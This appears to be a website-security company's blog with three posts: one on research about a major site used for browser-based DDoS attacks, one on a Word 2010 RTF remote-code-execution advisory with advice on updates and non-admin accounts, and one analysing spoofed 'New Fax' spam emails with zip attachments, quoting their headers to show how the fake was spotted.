By

Large website used to attack other websites

As a player in the website security space, we frequently find research of other organizations and we like to bring it to your attention so you learn more about the cybercriminals who want to infect your website with malware for their nefarious purposes.

In research announced by Incapsula: http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html, a website in the Alexa’s Top 50 was used to launch DDoS (Distributed Denial of Service) attacks on other websites.

As usual, you might ask, “Tom, why is this website security news important to me?”

It’s important that you learn why hackers want your website. You need to know why website malware is so prevalent. Yes, even if it’s a small blog that only covers events in your local community. Hackers can use your website for any of their money making schemes.

which flooded our client with over 20 million GET requests originating from the browsers of over 22,000 Internet users

In this report, which gets a little technical, they also mention that the new code is tracking the attack for what appears to be for billing purposes. Yet another income stream for cybercriminals.

The hackers could be offering this as a service, for which they charge a fee.

If you have questions about this, please ask in the comment section.

Thank you.

By

Previewing Outlook messages can lead to infected computer

Microsoft has announced a vulnerability in Word 2010. For those of you who aren’t intimately familiar with Microsoft Office products, Microsoft Word is the default reader for Outlook 2007, Outlook 2010 and Outlook 2013.

https://technet.microsoft.com/en-us/security/advisory/2953095

If you’re using Microsoft Outlook as your email program, this could affect you.

Why would a company dedicated to website security make you aware of this?

This particular vulnerability exposes your local computer to remote code execution exploitation. This means that if a hacker sends you a carefully crafted email message in RTF format, just previewing the message in Outlook, with Word 2010 as your default reader, would allow remote code to be executed on your computer – which means your computer could be infected.

We want to bring this to your attention so that you update all your software. If your local computer gets infected the hackers could steal your login credentials to your hosting account, your CMS (WordPress, Joomla, etc.), login to your account and infect your website.

We are concerned with your website security, but along with this comes being concerned about your local computer security as well.

We’ve stated this before, but it becomes clear in Microsoft’s announcement that the attacker, if successful, will have the same rights as the currently logged in user. If you login to your local computer as administrator, guess what? The hacker will have the same rights – administrator.

An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.

It’s advised that you create a separate “user” account on your computer. This user does not have the ability to install programs. If you want to install a new program on your computer, you logout as this user, login as administrator, install the software, then logout as administrator, login as the user and proceed with your normal activity.

Yes, this is not the most convenient way, however, neither is having your computer compromised.

Always keep your local computer software updated. This helps us keep your website security at the highest level.

Please post a comment if you find this helpful. Tweet this to your friends and family.

By

SPAM for law firms

Since we started offering our VPS and dedicated server software, we’ve been handling many SPAM issues for clients. Not only outgoing, but incoming as well.

One recent rash of SPAM seems to focus on law firms. I’m sure others are receiving these as well, but our experience has mostly seen these emails sent to law firms.

The scenario begins with an email with a subject line like:

New Fax: 2 pages

The body of the message will be something like:

Scanned from MFP61725171 by (domain of recipient).com
Date: Tue, 1 Apr 2014 20:17:54 +0800
Pages: 2
Resolution: 200×200 DPI

It appears to be an internal fax. It will usually show the sender (From:) as fax@(domain of recipient).com and the number of pages will vary.

The email contains an attachment, typically a .zip file – obviously infectious.

When we look at the headers here’s what we see:

Return-path:

Envelope-to: willie.james@(domain of recipient).com
Delivery-date: Mon, 31 Mar 2014 10:15:53 +0000
Received: from [106.79.10.18] (port=49927)
by server.(server for client).com with esmtp (Exim 4.82)
(envelope-from )
id 1WUZFv-0005zC-8e; Mon, 31 Mar 2014 10:15:53 +0000
Received: from 289-SN2MPN2-345.582d.mgd.msft.net ([106.79.10.18]) by
115-SN2MMR2-207.895d.mgd.msft.net ([106.79.10.18]) with mapi id
14.03.0563.358; Mon, 31 Mar 2014 15:45:51 +0530
Message-ID:
<6BY1VKL42LR58X56ARUF4VNG59U3YS6B@316-SN2MPN2-342.397d.mgd.msft.net>
From: "FAX"
To: john.assistant@(domain of recipient).com

Subject: New Fax : 5 pages
Thread-Topic: New Fax : 5 pages
Thread-Index: 9P7N7EWX4M3T3HCICOQW==
Date: Mon, 31 Mar 2014 15:45:51 +0530
Message-ID:

Accept-Language: en-US
Content-Language: en-US
Content-Type: multipart/mixed;
boundary="----=_Part_49160_3775187661.5707552433783"
X-MS-Has-Attach: yes
X-MS-Exchange-Organization-SCL: -1
X-MS-TNEF-Correlator:

MIME-Version: 1.0
X-MS-Exchange-Organization-AuthSource: 092-SN2MMR2-965.296d.mgd.msft.net
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 09
X-Originating-IP: [106.79.10.18]
X-MS-Exchange-Organization-AVStamp-Mailbox: MSFTFF;1;0;0 0 0
X-Auto-Response-Suppress: DR, RN, NRN, OOF, AutoReply
X-Spam-Status: No, score=3.0
X-Spam-Score: 30
X-Spam-Bar: +++
X-Ham-Report: Spam detection software, running on the system
"server.(server for client).com", has
identified this incoming email as possible spam. The original message
has been attached to this so you can view it (if it isn't spam) or label
similar future email. If you have any questions, see
root\@localhost for details.

Content preview: You have received a new fax (fax-954672.zip). Date/Time:
Mon,
31 Mar 2014 15:45:51 +0530. Number of pages:5 [...]

This is a case where the spammers are spoofing the from email address so it appears to be an internal fax communication.

This line tells us it did not originate internally:
Received: from [106.79.10.18] (port=49927)

According to whois.domaintools.com (an awesome service, you should subscribe!) that IP address is in India. Our client was here in the United States. Therefore we know it was fake.

If you use Outlook for email, you can see how to view the full headers by Googling “outlook view full headers”. If you use Outlook 2007, Outlook 2010, etc. you can further refine your search by adding that version. For instance you can use this in Google for Outlook 2007:

outlook 2007 view full headers

If you start getting these, just mark them as SPAM and move on with life. Your server is not infected. Your local computer is not infected either.